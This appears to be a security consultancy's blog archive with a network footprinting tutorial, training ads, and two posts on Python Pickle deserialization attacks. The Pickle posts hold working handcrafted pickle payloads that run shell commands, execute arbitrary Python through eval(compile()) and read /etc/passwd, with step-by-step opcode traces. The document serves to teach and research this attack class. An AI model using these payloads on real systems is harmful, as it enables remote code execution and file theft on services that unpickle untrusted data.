Grey bar Blue bar
Share this:

Fri, 9 Mar 2012

Foot printing – Finding your target...

We were asked to contribute an article to PenTest magazine, and chose to write up an introductory how-to on footprinting. We've republished it here for those interested.

Network foot printing is, perhaps, the first active step in the reconnaissance phase of an external network security engagement. This phase is often highly automated with little human interaction as the techniques appear, at first glance, to be easily applied in a general fashion across a broad range of targets. As a security analyst, footprinting is also one of the most enjoyable parts of my job as I attempt to outperform the automatons; it is all about finding that one target that everybody forgot about or did not even know they had, that one old IIS 5 webserver that is not used, but not powered off.

With this article I am going to share some of the steps, tips and tricks that pentesters and hackers alike use when starting on a engagement.

Approach

As with most things in life having a good approach to a problem will yield better results and overtime as your approach is refined you will consume less time while getting better results. By following a methodology, your footprinting will become more repeatable and thus reliable. A basic footprining methodology covers reconnaissance, DNS mining, various information services (e.g. whois, Robtex, routes), network registration information and active steps such as SSL host enumeration.

While the temptation exists to merely feed a domain name into a tool or script and take the output as your completed footprint, this will not yield a passable footprint for two reasons. Firstly, a single tool will not have access to all the disparate information sources that one should consult, and secondly the footprinting process is inherently iterative and continuous. A footprint is almost never complete; instead, a fork of the footprint data provides the best current view of the target, but the information could change tomorrow as new sites are brought online, or old sites are taken offline. As a new piece of data is found that could expand the footprint, a new iteration of the footprinting process triggers with that datum as the seed, and the results are combined with all discovered information.

Know your target

The very first thing to do is to get to know your target organisation. What they do, who they do it for, who does it for them, where they do it from - both online and in the kinetic world, what community or charity work they are involved in. This will give you an insight into what type of network/infrastructure you can expect. Reading public announcements, financial reports and any other documents published on or by the organisation might also yield interesting results. Any organisation that must publish regular reports (e.g. listed companies), provide a treasure trove of information for understanding the target's core business units, corporate hierarchy and lines of business. All these become very useful when selecting targets.

Dumpster diving, if you are up for it and have physical access to the target, means sifting through trash to get useful information, but in recent times social media can provide us with even more. Sites like LinkedIn, Facebook and Twitter can provide you with lists of employees and projects that the organisation is involved with and perhaps even information about third party products and suppliers that are in use.

One should even keep an eye out for evidence of previous breaches or loss of credentials. It has become common place for hackers to post information about security breaches on sites like pastebin.com. The most likely evidence would be credentials in the form of corporate emails and passwords being reused on unrelated sites that are hacked, and have their user databases uploaded. In addition, developers use sites like Pastebin to share code, ideas and patches, and if you are lucky you might just find a little snippet of code sitting out in the open on Pastebin, that will give you the edge.

DNS

“The Domain Name System (DNS) is a hierarchical distributed naming system for computers, services, or any resource connected to the Internet or a private network.” — WikiPedia

In a nutshell, DNS is used to convert computer names to their numeric addresses.

Start by enumerating every possible domain owned by the target. This is where the information from the initial reconnaissance phase comes in handy, as the target's website will likely point to external domains of interest and also help you guess at possible names. With a list of most discovered domains in hand, move on to a TLD (Top level domain) expand. TLDs are the highest level subdomains in DNS; .com, .net, .za, .mobi are all examples of TLDs (The Mozilla Organization maintains a list of TLDs https://wiki.mozilla.org/TLD_List).

In the next step, we take a discovered discovered domain and check to see if there are any other domains with the same name, but with a different TLD. For example, if the target has the domain victim.com, test whether the domains victim.net, victim.info, victim.org etc. exist and if they exist check to see if they are owned by our target organization. To determine whether a domain exists or not, one should examine the SOA (start of authority) DNS record for the domain. Using commands like nslookup under Microsoft Windows or the dig/host commands under most of the *nix family will reveal SOA records.

Using dig, “dig zonetransfer.me soa”.

?

Figure 1: Using dig to get the SOA (Start of authority) record for a domain

If, by verifying the SOA, it is confirmed that the domain exists, then the next step is to track down who it belongs to. At this point the whois service is called upon. ‘Whois' is simply a registry that contains the information of the owner of a domain. Note that it is not entirely reliable and certainly not consistent. The following very simple query “whois zonetransfer.me” provides us with the owner of the domain “zonetransfer.me” detail.

Figure 2: Using whois to get the domain owner detail

After finding domains, running them through a TLD expansion and verifying their whois information, it is time to track down hosts. First we need to get the NS or name server records for the domains. Again using “dig zonetransfer.me ns” returns a list of all the name servers used by this domain. In many cases the name server will not be part of the target's network and is often out-of-scope, but they will still be used in the next step.

DNS yields much interesting information, but the default methods for extracting information from foreign servers effectively relies on a brute force. However, DNS supports a trick where all DNS information for a zone can be downloaded if the server allows it, and this is called a “zone transfer”. When enabled, they are extremely useful as they negate the need for guessing or brute-forcing; sadly they are commonly disabled. Still, given the usefulness of zone transfers it is always worth testing for. Zone transfers should be performed against all the name servers that are specified in the NS records of a domain as the data contained in each name server should be the same, but the security configuration might be different. Using dig, the following command will attempt to perform a zone transfer “dig axfr @ns12.zoneedit.com zonetransfer.me”

Figure 3: Performing a zone transfer using dig

As mentioned previously, zone transfers are not that common. When we cannot download the zone file, there are a couple of other tricks that might work. One is to brute force or guess host names: by using a long list of common hostnames one can test for names such as “fw.victim.com”, “intranet.victim.com”, “mail.victim.com” and so on. The names can be commonly seen hostnames, generated names when computers are assigned numeric or algorithmic names, or from sets of related names such as characters from a book series. When brute forcing DNS, be sure to check the following DNS records: CNAME, A and AAAA. Again this is easy using a tool like dig. “dig www.google.com a” produces the DNS configuration for www.google.com, note that the hostname www.google.com actually has multiple DNS entries, one CNAME record, and multiple A records. Looking at the IP addresses it is clear that there are several different hosts (2 in the screenshot below).

Figure 4: Using dig to get the a record for a host entry

Doing this manually seems easy and quick, (and it is) but if we want to brute force or guess many host names, then this will take too long. Of course, it is easy enough to script these commands to automate the process; however there are existing tools written specifically for this purpose. One of the most popular tools, Fierce, is a perl script written by RSnake (http://ha.ckers.org/fierce/), which is easy to use and has many useful functions. Additionally, there are tools like Paterva's Maltego and SensePost's Yeti (a tool I wrote) which provide graphical tools for this purpose.

If we happen to have a list of IP addresses or IP netblocks of the target, then a further DNS trick is to convert the addresses into hostnames using reverse lookups to get the PTR record entry. This is useful since reverse records are easily brute forced in IPv4. Bear in mind that DNS does not require a PTR record (reverse entry) or that entries in the reverse zone must match entries in the forward zone. But the result can give you an idea of whether the host is a shared host, owned and hosted by the company or just remote hosted.

To test once more, try using dig, “dig 104.66.194.173.in-addr.arpa ptr”. While this too can be easily automated, the previously mentioned tools will also handle PTR records.

Search engines:

DNS interrogation and mining forms the bulk foot printing, but thanks to modern search engines like Google and Bing, finding targets has become much easier.

Apart from the normal searching for your target, as you would do in your initial phase, you can actually use the data that you discovered during the course of the DNS mining to try and get further information using search engines. Bing from Microsoft provides us with two really useful search operators: “ip:” and “site:”. When using the “ip:” operator, Bing will return a list of hosts that it has indexed that resolve to the IP address that you have specified. Alternatively the “site:” operator when used with a domain name, will return a list of host names that have been indexed by the search engine and belong to the domain specified. Quick and easy, and Bing also provides you with a very simple free API that you can use to automate these searches.

Address mapping

All this fuss with DNS is important, but it is only useful insofar as they lead us to addresses. The next step is discovering where the target exists within the IP address space. Luckily useful tools and resources exist to help us uncover these ranges, by automating a combination of manual techniques such as whois querying, traceroute and netblock calculators. In the previous section the whois tool was used to get the domain owner information. The same tool can be used to discover the ownership/assignment details of a specific IP address. Let's take www.facebook.com; one of the IP addresses that it resolves to is 69.63.190.10. “whois 69.63.190.10” produces the following output.

Figure 5: Getting the netblock and owner using whois

From the whois output we get really useful information. First is a netblock range 69.63.176.0-69.63.190.255 as well as the owner of this net block, namely Facebook, Inc. In this case we are lucky and the netblock is registered to facebook, but often you will only get the network service provider to which the netblock is allocated to. In that case, you will have to query the service provider in order to gain more info about the specific netblock. Online resources can also be very useful, for example ARIN (American Registry for Internet Numbers) or any of the other regional registries (RIPE, AfriNIC, APNIC and LACNIC) provides a reverse whois search interface where one can search for organisation names and other terms, even performing wild card searches. Giving Facebook a second look, we try a search on the reverse whois interface found at http://whois.arin.net/ with the term “facebook”, and get a list of five additional network ranges.

Figure 6: Search results for ARIN reverse whois

SSL Certificates

Lastly, we turn to SSL. SSL may be more familiar as a “protection” against nasty eavesdroppers and men-in-the-middle, but it is useful for footprinters. How? It is really simple actually, one of the security checks performed by browsers when deciding on the validity of a SSL certificate is whether the Common Name contained in the certificate matches the DNS name of the host requested from the browser. How does this help? Say a list of IP addresses has been produced; the next step would be to perform a reverse lookup of all these addresses. However, if no reverse entry is present and Bing has no record of the IP, then some creativity is called for. If an HTTPS website is hosted on that address then simply browse to that IP address and, when presented with the invalid certificate error, message, look for the “real” host name.

Figure 7: Firefox reporting the common name contained in a SSL certificate for a host

Again, this is something that is easily automated, so we have included a module in Yeti to actually do this for you.

Conclusion

Foot printing might at first glance appear to be simple and mundane, but the more you do it, the more you will realise that very few organisations have a handle on exactly what they have and what they present to the Internet. As the Internet and networks evolve so will the way companies and organisations use it, and so will their footprint. A year-old footprint could be hopelessly outdated, and ongoing footprinting helps organisations maintain a current view of their threat landscape.

With the ongoing move away from local infrastructure to hosted infrastructure, the footprint expands, spreads and grows, and so will our quest to find as much as possible.

Fri, 27 May 2011

Hacking by Numbers: BlackOps Edition

The brand new BlackOps HBN course makes its debut in Vegas this year. The course finds its place as a natural follow on from Bootcamp, and prepares students for the more intense Combat edition. Where Bootcamp focuses on methodology and Combat focuses on thinking, BlackOps covers tools and techniques to brush up your skills.

This course is split into eight segments, covering scripting, targeting, compromise, privilege escalation, pivoting, exfiltration, client-side and and even a little exploit writing. BlackOps is different from our other courses in that it is pretty full of tricks, which are needed to move from the methodology of hacking to professional-level pentesting. It's likely to put a little (more) hair on your chest.

Course Name: Hacking By Numbers: BlackOps Edition Venue: BlackHat Briefings, Caesars Palace Las Vegas, NV Dates: July 30-31 & August 1-2 2011 Sign up here.

Thu, 24 Feb 2011

Playing with Python Pickle #3

[This is the third in a series of posts on Pickle. Link to part one and two.]

Thanks for stopping by. This is the third posting on the bowels of Python Pickle, and it's going to get a little more complicated before it gets easier. In the previous two entries I introduced Pickle as an attack vector present in many memcached instances, and documented tricks for executing OS commands across Python versions as well as a mechanism for generically calling class instance methods from within the Pickle VM.

In this post we'll look at executing pure Python code from within a Pickle steram. While running os.system() or one of its cousins is almost always a necessity, having access to a Python interpreter means that your exploits can be that much more efficient (skip on the Shell syntax, slightly more portable exploits). I imagine one would tend to combine the pure Python with os.system() calls.

Normal execution of pure Python

Dynamic Python execution is normally acheived through the 'exec' statement. However, since 'exec' is a Python statement and not a class method, the depickler knows nothing about 'exec'. __builtin__.eval() on the other hand is a method that the depickler can call; however eval() normally takes an expression only. Thus,

eval("import os; os.system('ls'))

fails. It's worth noting that one can still call methods in expressions, so

eval("os.system('ls')")

can work if the 'os' module is present in the environment. If it isn't, you can still import 'os' with the expression:

eval("__import__('os').system('ls')")

or even execute a full code block with a double eval():

eval('eval(compile("import os;os.system(\\"ls\\")","q","exec"))')

Moral of that story: don't ever eval() untrusted input. Obviously.

However, we want to execute not only expressions but full Python scripts. eval() will also accept a code object, which is produced by compile(), and compile() will accept a full Python script. For example, to prove execution here's the venerable timed wait:

cmd = "import os; f=os.popen('sleep 10'); f.read()" c = compile(cmd,"foo","exec") eval(c)

Reaching into eval'ed code

Continuing with eval(), we try a similar example except we execute 'ls' instead of sleep (and do it in one line of Python). There's an important distinction here, and that is the return value of eval; notice how 'ls' returns nothing:

>>> ret=eval(compile("import os; f=os.popen('ls'); f.read()","foo","exec")) >>> print ret None

This is because eval() always returns "None" if the supplied code object was compiled with "exec" and means we need a different trick for extracting contents of the eval'ed script. Luckily our first idea worked (yay), so we didn't look further; there may be better/faster/easier options. That idea was to modify the script's globals (variables scoped for the entire script) inside the eval() call, and access globals outside the eval() calls. This works, as globals are passed into eval() and changes reflects after the call returns:

>>> print smashed Traceback (most recent call last): File "", line 1, in NameError: name 'smashed' is not defined >>> eval(compile("import os; f=os.popen('ls'); smashed=f.read()","foo","exec")) >>> print smashed Desktop Documents Downloads Library Movies Music ...

Converting to Pickle

In the example above, the global "smashed" is created inside eval(), and carried into the outer environment. It is quite easy to convert the eval(compile()) pattern into a Pickle:

c__builtin__ eval (c__builtin__ compile (S'import os\\np=os.popen("ls -al")\\nsmashed=p.read()\\n' S"" S"exec" tRc__builtin__ globals )RtRc__builtin__ globals )R.

This executes 'ls -al', stores it in the "smashed" global variables and returns the whole globals dict as the end result of depickling. However, it is messy; globals contains other entries which is a waste of space and makes output harder to read. If we're inserting this into a broader pickle, we'd like to have more control (i.e. return a single string) rather than hope that whatever object we are injecting into can handle a dict.

Final exercise

Pickle does not appear to have a way of referencing dict entries (i.e. globals()['smashed'] in Python), so again we have to dig into the docs. The dict builtin supports a "get" method, but requires a class instance... which should sound a little familiar if you still recall the trick from the last post on reading output from os.popen. In Python terms what we're doing is:

code=compile("import os; f=os.popen('ls'); smashed=f.read()","foo","exec") eval(code) __builtin__.apply(__builtin__.getattr(__builtin__.dict,"get"),(__builtin__.globals(),"smashed"))

Converted into Pickle we get:

c__builtin__ eval (c__builtin__ compile (S'import os\\np=os.popen("ls -al")\\nsmashed=p.read()\\n' S"" S"exec" tRc__builtin__ globals )RtR0(c__builtin__ globals )RS"smashed" tp0 0c__builtin__ getattr (c__builtin__ dict S"get" tRp1 0c__builtin__ apply (g1 g0 tR.

The execution trace of this Pickle stream is:

  1. 'c' -> find the callable "__builtin__.eval", push it onto the stack [SB] [__builtin__.eval]
  2. '(' -> push a MARK onto the stack [SB] [__builtin__.eval] [MARK]
  3. 'c' -> find the callable "__builtin__.compile", push it onto the stack [SB] [__builtin__.eval] [MARK] [__builtin__.compile]
  4. '(' -> push a MARK onto the stack [SB] [__builtin__.eval] [MARK] [__builtin__.compile] [MARK]
  5. "S'import os\\np=os.popen("ls -al")\\nsmashed=p.read()\\n'" -> push 'import os\\np=os.popen("ls -al")\\nsmashed=p.read()\\n' onto the stack [SB] [__builtin__.eval] [MARK] [__builtin__.compile] [MARK] ['import os\\np=os.popen("ls -al")\\nsmashed=p.read()\\n']
  6. "S''" -> push '' onto the stack [SB] [__builtin__.eval] [MARK] [__builtin__.compile] [MARK] ['import os\\np=os.popen("ls -al")\\nsmashed=p.read()\\n'] ['']
  7. "S'exec'" -> push 'exec' onto the stack [SB] [__builtin__.eval] [MARK] [__builtin__.compile] [MARK] ['import os\\np=os.popen("ls -al")\\nsmashed=p.read()\\n'] [''] ['exec']
  8. 't' -> pop 'import os\\np=os.popen("ls -al")\\nsmashed=p.read()\\n','','exec' and MARK, push ('import os\\np=os.popen("ls -al")\\nsmashed=p.read()\\n','','exec') [SB] [__builtin__.eval] [MARK] [__builtin__.compile] [('import os\\np=os.popen("ls -al")\\nsmashed=p.read()\\n','','exec')]
  9. 'R' -> pop "__builtin__.compile" and "('import os\\np=os.popen("ls -al")\\nsmashed=p.read()\\n','','exec')", call __builtin__.compile('import os\\np=os.popen("ls -al")\\nsmashed=p.read()\\n','','exec'), push the code object onto the stack [SB] [__builtin__.eval] [MARK] [code_object]
  10. 'c' -> find the callable "__builtin__.globals", push it onto the stack [SB] [__builtin__.eval] [MARK] [code_object] [__builtin__.globals]
  11. ')' -> push an empty tuple onto the stack [SB] [__builtin__.eval] [MARK] [code_object] [__builtin__.globals] [()]
  12. 'R' -> pop "__builtin__.globals" and "()", call __builtin__.globals(), push the dict onto the stack [SB] [__builtin__.eval] [MARK] [code_object] []
  13. 't' -> pop code_object, and MARK, push (code_object, ) [SB] [__builtin__.eval] [(pop code_object, )]
  14. 'R' -> pop "__builtin__.eval" and "(pop code_object, )", call __builtin__.eval(pop code_object, ), push the None onto the stack [SB] [None]
  15. '0' -> pop None from the stack [SB]
  16. '(' -> push a MARK onto the stack [SB] [MARK]
  17. 'c' -> find the callable "__builtin__.globals", push it onto the stack [SB] [MARK] [__builtin__.globals]
  18. ')' -> push an empty tuple onto the stack [SB] [MARK] [__builtin__.globals] [()]
  19. 'R' -> pop "__builtin__.globals" and "()", call __builtin__.globals(), push the dict onto the stack [SB] [MARK] [<globals dict>]
  20. "S'smashed'" -> push 'smashed' onto the stack [SB] [MARK] [<globals dict>] ['smashed']
  21. 't' -> pop <globals dict>, 'smashed' and MARK, push (, 'smashed') [SB] [(<globals dict>,'smashed')]
  22. 'p0' -> store (<globals dict>, 'smashed') in register 0 [SB] [(<globals dict>,'smashed')]
  23. '0' -> pop (<globals dict>, 'smashed') from the stack [SB]
  24. 'c' -> find the callable "__builtin__.getattr", push it onto the stack [SB] [__builtin__.getattr]
  25. '(' -> push a MARK onto the stack [SB] [__builtin__.getattr] [MARK]
  26. 'c' -> find the callable "__builtin__.dict", push it onto the stack [SB] [__builtin__.getattr] [MARK] [__builtin__.dict]
  27. "S'get'" -> push 'get' onto the stack [SB] [__builtin__.getattr] [MARK] [__builtin__.dict] ['get']
  28. 't' -> pop __builtin__.dict,'get' and MARK, push (__builtin__.dict,'get') [SB] [__builtin__.getattr] (__builtin__.dict,'get')
  29. 'R' -> pop "__builtin__.getattr" and "(__builtin__.dict,'get')", call __builtin__.getattr(__builtin__.dict,'get'), push the attribute onto the stack [SB] [dict.get]
  30. 'p1' -> store dict.get in register 1 [SB] [dict.get]
  31. '0' -> pop dict.get from the stack [SB]
  32. 'c' -> find the callable "__builtin__.apply", push it onto the stack [SB] [__builtin__.apply]
  33. '(' -> push a MARK onto the stack [SB] [__builtin__.apply] [MARK]
  34. 'p1' -> push dict.get from register 1 [SB] [__builtin__.apply] [MARK] [dict.get]
  35. 'p1' -> push (<globals dict>, 'smashed') from register 0 [SB] [__builtin__.apply] [MARK] [dict.get] [(<globals dict>, 'smashed')]
  36. 't' -> pop dict.get,(<globals dict>, 'smashed') and MARK, push [dict.get,(<globals dict>, 'smashed')] [SB] [__builtin__.apply] [(dict.get,(<globals dict>, 'smashed'))]
  37. 'R' -> pop "__builtin__.apply" and "(dict.get,(<globals dict>, 'smashed'))", call __builtin__.apply(dict.get,(<globals dict>, 'smashed')), push the "smashed" value onto the stack [SB] ["Desktop\nDocuments\nDownloads\n..."]
  38. '.' -> pop and return value of "smashed", exit [SB]

Ending off

This post demonstrates a few concepts that are of interest to the Pickle hacker. We showed how to construct a Pickle stream such that arbitrary Python was executed during the deserialization process, we mentioned that it was possible to carry information from within an eval() call into the executing environment of the depickler, and finally we revisited the trick for indirectly calling class instance methods in order to return eval()'s value as the depickled object.

In the last posting on this topic, we'll look at tactical uses for all the Pickle hacking we've covered: where to find Pickle objects, where they're processed and how to modify objects in place. Stay tuned.

Mon, 15 Nov 2010

Playing with Python Pickle #2

[This is the second in a series of posts on Pickle. Link to part one.]

In the previous post I introduced Python's Pickle mechanism for serializing and deserializing data and provided a bit of background regarding where we came across serialized data, how the virtual machine works and noted that Python intentionally does not perform security checks when unpickling.

In this post, we'll work through a number of examples that depict exactly why unpickling untrusted data is a dangerous operation. Since we're going to handcraft Pickle streams, it helps to have an opcode reference handy; here are the opcodes we'll use:

  • c<module>\n<function>\n -> push <module>.<function> onto the stack. It's actually more subtle than this but this simplification works for us.
  • ( -> push a MARK object onto the stack.
  • S'<string>'\n -> Push <string> object onto the stack.
  • V'<string>'\n -> Push Unicode <string> object onto the stack.
  • l -> pop everything off the stack up to the topmost MARK object, create a list with the objects (excl MARK) and push the list back onto the stack
  • t -> pop everything off the stack up to the topmost MARK object, create a tuple with the object (excl MARK) and push the tuple back onto the stack
  • R -> pop two objects off the stack; the top object is treated is an argument and the lower object is a callable (function object). Apply the function to the arguments and push the result back onto the stack
  • p<index>\n -> Peek at the top stack object and store it in memo or register <index>.
  • g<index>\n -> Grab an object from memo or register <index> and push onto the stack.
  • 0 -> Pop and discard the topmost stack item.
  • . -> Terminate the virtual machine. If you're pasting the examples below into larger Pickle streams, make sure to remove the '.'
Executing OS commands

In the previous post, the canonical abuse case for unpickling untrusted data was listed: cos system (S'echo hello world' tR.

Let's step through this (the stack is included after each step, [SB] indicates the stack bottom):

  1. 'c' -> find the callable "os.system", push the callable onto the stack. [SB] [os.system]
  2. '(' -> push a MARK onto the stack [SB] [os.system] [MARK]
  3. "S'echo hello world'" -> push 'echo hello world' onto the stack [SB] [os.system] [MARK] ['echo hello world']
  4. 't' -> pop "echo hello world" and MARK, push the tuple "('echo hello world')" onto the stack [SB] [os.system] [('echo hello world')]
  5. 'R' -> pop "('echo hello world')" and "os.system", call os.system('echo hello world'), push the result back on the stack [SB] [0]
  6. '.' -> pop the result off the stack and terminate [SB], result was '0'
<rat-hole>

Perhaps one instruction that should be clarified is 'c', which loads a class based on the two arguments 'module' and 'class'. Pickle's docs define the behaviour as follows: "The class object module.class is pushed on the stack. More accurately, the object returned by self.find_class(module, class) is pushed on the stack". Our previous simplified definition said that the 'c' instruction loaded function references, and this is the case, however the full explanation shows that more types than function references can be loaded.

For our purposes we want to load classes that are callable, which is a requirement for the 'R' instruction. A callable is an object that has a "__call__" attribute which, if you're also not a Python programmer, means having to search for more information. An non-expert definition is something like: if the module has functions (e.g. os.system()) then these are suitable for 'c'. However, class instance method objects (x=Foo();x.bar()) are not suitable for the 'c' opcode since it cannot handle class instances. Also worth pointing out that the 'R' opcode doesn't care about what type of object it executes, so long as the object responds to "__call__". The interplay between 'c' and 'R' is important for the approach shown later, since 'c' is quite limited but 'R' can handle more types of objects.

What this rat-hole concludes with is that we have not come across a Pickle example showing how to execute method calls on class instance objects.

</rat-hole>

Let's try improve on the command execution example; it's cute for executing commands, but if the unpickling happens on an app server then we won't see the output of "os.system()" since it returns the retval of the shell rather than stdout/stderr. Any output of the command is printed to the server's stdout. Thus for our 'echo hello world' example, the unpickling returns '0' even though the command successfully ran.

Our first goal is to retrieve the output of commands in the reconstructed object. Initial ideas focused on manipulating the shell's return value to carry over output:

cos system (S'printf -v a \'%d\' "\'`uname -a | sed \'s/.\\{2\\}\\(.\\).*/\\1/\'`";exit $a;' tR.

This uses a combination of the shell's backtick and printf statements, sed and exit to return one character at a time in the exit status. However this too is messy; if the output changes between invocations this approach is pretty worthless and it's also noisy and low bandwidth.

The next option was "os.popen", however we quickly became bogged down. "os.popen()" returns an instance (e.g. proc=os.popen("echo foo")) and in order to access the output of the command, we'd need to call "proc.read()". However, the pickle instruction set doesn't appear to support calling instance methods directly as we've already mentioned. The next option was to look for other modules, and the 'subprocess' module did the trick with it's 'check_output()' function, which takes an executable and a set of arguments, runs the executable on the arguments and returns the contents as a string:

csubprocess check_output (S'uname' tR.

returns

'Darwin\n'

This looks like good news in that we're executing commands and viewing output, however the downsides quickly become apparent. "subprocess.check_output" does not invoke a shell, so we can't simply pass in "uname -a" as a single string, it needs to be broken up into arguments. More importantly though, "check_output" was only added in Python 2.7, so with earlier versions this won't work. We can easily overcome the first of these hurdles; "check_output" will take arguments specified in a list like so:

subprocess.check_output(["uname", "-a"])

We just need to craft the instructions to create a list and leave it on the stack:

csubprocess check_output ((S'uname' S'-a' ltR. This is identical to the previous example except for the additional MARK instruction '(', the '-a' string argument and the 'l' instruction to build a list from the previous MARK. This is a rough execution trace of the VM on the instruction sequence:

  1. 'c' -> find the callable "subprocess.check_output", push the callable onto the stack. [SB] [subprocess.check_output]
  2. '(' -> push a MARK onto the stack [SB] [subprocess.check_output] [MARK]
  3. '(' -> push a MARK onto the stack [SB] [subprocess.check_output] [MARK] [MARK]
  4. "S'uname'" -> push 'uname' onto the stack [SB] [subprocess.check_output] [MARK] [MARK] ['uname']
  5. "S'-a'" -> push '-a' onto the stack [SB] [subprocess.check_output] [MARK] [MARK] ['uname'] ['-a']
  6. 'l' -> pop "uname", "-a" and MARK, push the list "['uname','-a']" onto the stack [SB] [subprocess.check_output] [MARK] [['uname','-a']]
  7. 't' -> pop "['uname','-a']" and MARK, push the tuple "(['uname','-a'])" onto the stack [SB] [subprocess.check_output] [(['uname','-a'])]
  8. 'R' -> pop "(['uname','-a'])" and "subprocess.check_output()", call subprocess.check_output((['uname','-a'])), push the result back on the stack [SB] ['Darwin insurrection.local 10.4.0 Darwin Kernel Version 10.4.0: Fri Apr 23 18:28:53 PDT 2010; root:xnu-1504.7.4~1/RELEASE_I386 i386\n']
  9. '.' -> pop the result off the stack and terminate [SB], result was 'Darwin insurrection.local 10.4.0 Darwin Kernel Version 10.4.0: Fri Apr 23 18:28:53 PDT 2010; root:xnu-1504.7.4~1/RELEASE_I386 i386\n'
The result unfortunately carries a trailing newline, which is ugly. We can make use of the virtual machine to clean up the output for us, by calling "string.strip()" on the output:

cstring strip (csubprocess check_output ((S'uname' S'-a' ltRtR.

The trace has been omitted since it just includes another function call, but the approach hints at how one might go about dealing with class instances: attempt to call a module function on the class instance.

If the "check_output" method is relied upon, then we're still stuck with Python 2.7. Ideally we'd like to run "p=os.popen('ls -al');p.read()", however since the 'c' instruction required modules and classes, and could not handle class instances, it was not possible to perform this directly. It bears repetition though that the 'R' instruction could handle references to instance methods, since they are inherently callable. Thus we need to find a way to call an instance method using only functions. Cue a diversion into Python's introspection support:

  • __builtin__.getattr(foo, "attribute") returns foo.attr. e.g. __builtin__.getattr(file, "read") -> file.read
  • __builtin__.apply(func, [args]) executes func([args])
Using the introspection tricks and without calling methods on class instances explicitly, we can execute "p=os.popen('ls -al'); p.read()" with the following Python:

__builtin__.apply(__builtin__.getattr(file,"read"),[os.popen("ls -al")])

Converted into Pickle, this becomes:

cos popen (S'ls -al' tRp0 0c__builtin__ getattr (c__builtin__ file S"read" tRp1 0c__builtin__ apply (g1 (g0 ltR.

That's quite a mouthful, here's the breakdown:

  1. 'c' -> find the callable "os.popen", push it onto the stack [SB] [os.popen]
  2. '(' -> push a MARK onto the stack [SB] [os.popen] [MARK]
  3. "S'ls -al'" -> push 'ls -al' onto the stack [SB] [os.popen] [MARK] ['ls -al']
  4. 't' -> pop 'ls -al' and MARK, push ('ls -al') [SB] [os.popen] [('ls -al')]
  5. 'R' -> pop "os.popen" and "('ls -al')", call os.popen('ls -al'), push the opened file object onto the stack [SB] [<open file>]
  6. 'p0' -> store "<open file>" in register 0 [SB] [<open file>]
  7. '0' -> pop and discard topmost stack item [SB]
  8. 'c' -> find the callable '__builtin__.getattr', push it onto the stack [SB] [__builtin__.getattr]
  9. '(' -> push a MARK onto the stack [SB] [__builtin__.getattr] [MARK]
  10. 'c' -> find the callable '__builtin__.file', push it onto the stack [SB] [__builtin__.getattr] [MARK] [__builtin__.file]
  11. "S'read'" -> push 'read' onto the stack [SB] [__builtin__.getattr] [MARK] [__builtin__.file] ['read']
  12. 't' -> pop 'read', "__builtin__.file" and MARK, push (__builtin__.file, 'read') [SB] [__builtin__.getattr] [(__builtin__.file, 'read')]
  13. 'R' -> pop "__builtin__.getattr" and "(__builtin__.file, 'read')", call __builtin__.getattr(__builtin__.file, 'read'), push the returned object onto the stack [SB] [<method object for 'file.read'>]
  14. 'p1' -> store "<method object for 'file.read'>" in register 1 [SB] [<method object for 'file.read'>]
  15. '0' -> pop and discard topmost stack item [SB]
  16. 'c' -> find the callable '__builtin__.apply', push it onto the stack [SB] [__builtin__.apply]
  17. '(' -> push a MARK onto the stack [SB] [__builtin__.apply] [MARK]
  18. 'g1' -> retrive contents of register 1, push onto stack [SB] [__builtin__.apply] [MARK] [<method object for 'file.read'>]
  19. '(' -> push a MARK onto the stack [SB] [__builtin__.apply] [MARK] [<method object for 'file.read'>] [MARK]
  20. 'g0' -> retrive contents of register 0, push onto stack [SB] [__builtin__.apply] [MARK] [<method object for 'file.read'>] [MARK] [<open file>]
  21. 'l' -> pop "<open file>" and MARK, push the list "[<open file>]" [SB] [__builtin__.apply] [MARK] [<method object for 'file.read'>] [[<open file>]]
  22. 't' -> pop '<method object for '<file.read'>', "[<open file>]" and MARK, push the tuple "(<file.read'>, '[<open file>])" [SB] [__builtin__.apply] [(<method object for 'file.read'>,[<open file>])]
  23. 'R' -> pop "__builtin__.apply" and "(<method object for 'file.read'>,[<open file>])", call __builtin__.apply(<method object for 'file.read'>,[<open file>]), push the returned object onto the stack [SB] ['lrwxr-xr-x@ 1 root wheel 11 Mar 7 2010 /tmp -> private/tmp\n']
  24. '.' -> pop the result off the stack and terminate [SB], returned string was "lrwxr-xr-x@ 1 root wheel 11 Mar 7 2010 /tmp -> private/tmp\n"
This is really useful, since we can now return command output in any Python version that supports Pickle.

That's enough Pickle for today, I'll leave you with a final modification of the above pickle string, that reads and returns the contents of files:

c__builtin__ file (S"/etc/passwd" tRp0 0c__builtin__ getattr (c__builtin__ file S"read" tRp1 0c__builtin__ apply (g1 (g0 ltR.

Fri, 15 Oct 2010

Sensepost Training in November

Our next scheduled training sessions have been planned for November. If you're interested in attending, the dates and locations are:

1) HBN Bootcamp Edition 7-9th November, BlackHat Abu Dhabi

'Hacking By Numbers - Bootcamp Edition' is our 'introduction to hacking' course. It is strongly method-based and emphasizes structure, approach and thinking over tools and tricks. The course is popular with beginners, who gain their first view into the world of hacking, and experts, who appreciate the sound, structured approach.

2) HBN Extended (Cadet & Bootcamp) 9-12th November

The HBN 'Extended Edition' is simply an intensive extended version of the regular Bootcamp course. Whilst the content and structure are essentially the same as Bootcamp, the Extended Edition offers students a deeper understanding of the concepts being presented and affords them more time to practice the techniques being taught. Extended Edition is currently offered in Switzerland and South Africa only, or can be arranged on request.

3) HBN Developer Edition 15-17th November

'Hacking By Numbers - Developer Edition' is a course aimed at arming web application developers with knowledge of web application attack techniques currently being used in the 'wild' and how to combat them. Derived from our internationally acclaimed 'Hacking By Numbers' security training, this course focuses heavily on two questions: "What am I up against?" and "How can I protect my applications from attack?" During the course sample applications will be dissected to discover security related bugs hidden within the code. The class will then consider prevention, detection & cure.

More information is available on our website at www.sensepost.com/training

or contact us on training@sensepost.com or call the office on 012-460 0880 to register.